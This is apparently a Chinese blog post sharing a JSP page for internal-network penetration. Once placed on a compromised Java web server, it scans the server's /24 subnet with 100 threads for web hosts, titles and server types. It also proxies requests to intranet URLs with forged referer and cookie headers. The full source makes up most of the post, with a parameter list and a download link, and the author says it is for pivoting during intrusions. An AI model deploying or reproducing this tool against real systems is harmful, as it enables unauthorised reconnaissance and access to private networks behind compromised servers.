..
1.直接访问默认扫描当前IP的C段,获取标题、web容器.
2.可以自定义传入需要扫描的段,传入参数ip即可
3.代理访问参数为url,可简单的访问内网的web,对了,我还加载了网站里的css,做到尽量看上去和直接访问的效果一样
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <%@ page isThreadSafe="false"%> <%@page import="java.io.PrintWriter"%> <%@page import="java.io.OutputStreamWriter"%> <%@page import="java.util.regex.Matcher"%> <%@page import="java.io.IOException"%> <%@page import="java.net.InetAddress"%> <%@page import="java.util.regex.Pattern"%> <%@page import="java.net.HttpURLConnection"%> <%@page import="java.util.concurrent.LinkedBlockingQueue"%> <%!final static List<String> list = new ArrayList<String>(); String referer = ""; String cookie = ""; String decode = "utf-8"; int thread = 100; HttpURLConnection getHTTPConn(String urlString) { try { java.net.URL url = new java.net.URL(urlString); java.net.HttpURLConnection conn = (java.net.HttpURLConnection) url .openConnection(); conn.setRequestMethod("GET"); conn.addRequestProperty("User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon;)"); conn.addRequestProperty("Accept-Encoding", "gzip"); conn.addRequestProperty("referer", referer); conn.addRequestProperty("cookie", cookie); //conn.setInstanceFollowRedirects(false); conn.setConnectTimeout(3000); conn.setReadTimeout(3000); return conn; } catch (Exception e) { return null; } } HttpURLConnection conn; String getHtmlContext(HttpURLConnection conn, String decode) { Map<String, Object> result = new HashMap<String, Object>(); try { String code = "utf-8"; if (decode != null) { code = decode; } StringBuffer html = new StringBuffer(); java.io.InputStreamReader isr = new java.io.InputStreamReader( conn.getInputStream(), code); java.io.BufferedReader br = new java.io.BufferedReader(isr); String temp; while ((temp = br.readLine()) != null) { if (!temp.trim().equals("")) { html.append(temp).append("/n"); } } br.close(); isr.close(); return html.toString(); } catch (Exception e) { System.out.println("getHtmlContext:"+e.getMessage()); return "null"; } } String getServerType(HttpURLConnection conn) { try { return conn.getHeaderField("Server"); } catch (Exception e) { return "null"; } } String getTitle(String htmlSource) { try { List<String> list = new ArrayList<String>(); String title = ""; Pattern pa = Pattern.compile("<title>.*?</title>"); Matcher ma = pa.matcher(htmlSource); while (ma.find()) { list.add(ma.group()); } for (int i = 0; i < list.size(); i++) { title = title + list.get(i); } return title.replaceAll("<.*?>", ""); } catch (Exception e) { return null; } } List<String> getCss(String html, String url, String decode) { List<String> cssurl = new ArrayList<String>(); List<String> csscode = new ArrayList<String>(); try { String title = ""; Pattern pa = Pattern.compile(".*href=/"(.*)[.]css"); Matcher ma = pa.matcher(html.toLowerCase()); while (ma.find()) { cssurl.add(ma.group(1) + ".css"); } for (int i = 0; i < cssurl.size(); i++) { String cssuuu = url + "/" + cssurl.get(i); String csshtml = "<style>" + getHtmlContext(getHTTPConn(cssuuu), decode) + "</style>"; csscode.add(csshtml); } } catch (Exception e) { System.out.println("getCss:"+e.getMessage()); } return csscode; } String getMyIPLocal() throws IOException { InetAddress ia = InetAddress.getLocalHost(); return ia.getHostAddress(); }%> <% String u = request.getParameter("url"); String ip = request.getParameter("ip"); if (u != null) { decode = request.getParameter("decode"); String ref = request.getParameter("referer"); String cook = request.getParameter("cookie"); if (ref != null) { referer = ref; } if (cook != null) { cookie = cook; } String html = getHtmlContext(getHTTPConn(u), decode); List<String> css = getCss(html, u, decode); String csshtml = ""; if (!html.equals("null")) { for (int i = 0; i < css.size(); i++) { csshtml += css.get(i); } out.print(html + csshtml); } else { response.setStatus(HttpServletResponse.SC_NOT_FOUND); out.print("请求失败!"); } return; } else if (ip != null || u == null) { String threadpp = (request.getParameter("thread")); if (threadpp != null) { thread = Integer.parseInt(threadpp); System.out.println(threadpp); } try { try { String http = "http://"; String localIP = getMyIPLocal(); if (ip != null) { localIP = ip; } String useIP = localIP.substring(0, localIP.lastIndexOf(".") + 1); final Queue<String> queue = new LinkedBlockingQueue<String>(); for (int i = 1; i <= 256; i++) { String url = http + useIP + i; queue.offer(url); } final JspWriter pw = out; ThreadGroup tg = new ThreadGroup("c"); for (int i = 0; i < thread; i++) { new Thread(tg, new Runnable() { public void run() { while (true) { String addr = queue.poll(); if (addr != null) { System.out.println(addr); HttpURLConnection conn = getHTTPConn(addr); String html = getHtmlContext(conn, decode); String title = getTitle(html); String serverType = getServerType(conn); String status = !html .equals("null") ? "Success" : "Fail"; if (html != null && !status.equals("Fail")) { try { pw.println(addr + " >> "+ title + ">>"+ serverType+ " >>" + status+ "<br/>"); } catch (Exception e) { e.printStackTrace(); } } } else { return; } } } }).start(); } while (tg.activeCount() != 0) { } } catch (Exception e) { e.printStackTrace(); } } catch (Exception e) { out.println(e.toString()); } } %>
参数:
ip [需要探测的ip段]
url [需要请求的地址]
其他参数:
thread [指定线程数]
decode [指定编码]
referer [伪造referer]
cookie [伪造cookie]
待完善:
1.一个C段,可能有多种编码格式,所以指定一个参数是有问题的。
2.端口可以修改传入一个数组,支持探测多个端口80,8080..
3.代理访问功能并不完善,例如加载js、加载图片、超链接替换成代理访问的链接、表单替换支持真实请求..
对了,其实这个主要是用于偷懒或者内网渗透时,各种代理总是遇到问题出不来。坐等大神写个完善版本的。
(我自己来还得慢慢改。)
PS:很久没写代码,代码渣,多线程还是没学会。看来代码就是得天天写才能熟练。
Link:http://pan.baidu.com/s/1qWDsv3e
本地下载
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论